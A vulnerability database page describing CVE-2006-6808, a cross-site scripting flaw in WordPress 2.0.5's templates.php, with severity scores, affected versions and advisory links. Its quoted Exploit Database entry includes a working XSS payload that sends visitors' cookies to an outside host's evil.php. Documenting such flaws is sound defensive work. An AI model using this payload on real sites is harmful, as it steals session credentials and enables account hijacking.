CVE-2006-6808 : Detail

CVE-2006-6808

2.95%V3
Network
2006-12-28
20h00 +00:00
2017-07-28
10h57 +00:00
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

Cross-site scripting (XSS) vulnerability in wp-admin/templates.php in WordPress 2.0.5 allows remote attackers to inject arbitrary web script or HTML via the file parameter. NOTE: some sources have reported this as a vulnerability in the get_file_description function in wp-admin/admin-functions.php.

CVE Informations

Metrics

Metrics Score Severity CVSS Vector Source
V2 6.8 AV:N/AC:M/Au:N/C:P/I:P/A:P [email protected]

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Exploit information

Exploit Database EDB-ID : 29356

Publication date : 2006-12-26 23h00 +00:00
Author : David Kierznowski
EDB Verified : Yes

source: https://www.securityfocus.com/bid/21782/info Wordpress is prone to an HTML-injection scripting vulnerability because the application fails to properly sanitize user-supplied input. Attacker-supplied HTML and script code would execute in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user; other attacks are also possible. Versions prior to 2.0.6 are vulnerable to this issue. < img src='https://wordpress-site/wp/wp-admin/templates.php?file=< img src=%27%27 onerror="javascript: var s=(document.location.toString().charAt(6)); var url=(%27http:%27%2Bs%2Bs%2B%27michaeldaw.org%27); document.location=url%2Bs%2B%27evil.php?%27%2Bdocument.cookie">' >

Products Mentioned

Configuraton 0

Wordpress>>Wordpress >> Version To (including) 2.0.5

Wordpress>>Wordpress >> Version 0.6.2

    Wordpress>>Wordpress >> Version 0.6.2.1

      Wordpress>>Wordpress >> Version 0.7

        Wordpress>>Wordpress >> Version 0.71

        Wordpress>>Wordpress >> Version 1.2

        Wordpress>>Wordpress >> Version 1.2.1

        Wordpress>>Wordpress >> Version 1.2.2

        Wordpress>>Wordpress >> Version 1.5

        Wordpress>>Wordpress >> Version 1.5.1

        Wordpress>>Wordpress >> Version 1.5.1.2

        Wordpress>>Wordpress >> Version 1.5.1.3

        Wordpress>>Wordpress >> Version 1.5.2

        Wordpress>>Wordpress >> Version 2.0

        Wordpress>>Wordpress >> Version 2.0.1

        Wordpress>>Wordpress >> Version 2.0.2

        Wordpress>>Wordpress >> Version 2.0.3

        Wordpress>>Wordpress >> Version 2.0.4

        References

        http://www.vupen.com/english/advisories/2006/5191
        Tags : vdb-entry, x_refsource_VUPEN
        http://secunia.com/advisories/23587
        Tags : third-party-advisory, x_refsource_SECUNIA
        http://secunia.com/advisories/23741
        Tags : third-party-advisory, x_refsource_SECUNIA
        http://security.gentoo.org/glsa/glsa-200701-10.xml
        Tags : vendor-advisory, x_refsource_GENTOO
        http://www.securityfocus.com/bid/21782
        Tags : vdb-entry, x_refsource_BID
        http://marc.info/?l=full-disclosure&m=116722128631087&w=2
        Tags : mailing-list, x_refsource_FULLDISC
        http://michaeldaw.org/
        Tags : x_refsource_MISC